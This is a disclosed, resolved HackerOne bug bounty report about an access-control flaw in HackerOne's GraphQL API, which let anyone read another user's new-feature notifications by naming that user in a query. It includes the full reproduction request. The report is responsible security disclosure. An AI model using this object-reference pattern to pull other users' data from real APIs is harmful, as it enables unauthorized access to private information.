Can read features from any user

Disclosed: 2018-03-12 12:49:00 By firs0v To security
Medium
Vulnerability Details
**Summary:** An attacker can read feature notifications from any user. Just need to change `me` to `user(username:"filedescriptor")` in your request to get the features. ### Steps To Reproduce `POST /graphql HTTP/1.1 Host: hackerone.com {"query":"query New_feature {\n query {\n id,\n ...F0\n }\n}\nfragment F0 on Query {\n user(username:\"filedescriptor\") {\n id, username\n, reputation, new_feature_notification {\n name,\n description,\n url,\n id\n }\n },\n id\n}","variables":{}}` ## Impact An attacker can read unread features from any user and have to know how long this user did not visit the hackerone (as example). Probably in future you will make individual feature for individual user. So now it's a bug.
Actions
View on HackerOne
Report Stats
  • Report ID: 316810
  • State: Closed
  • Substate: resolved
  • Upvotes: 24
Share this report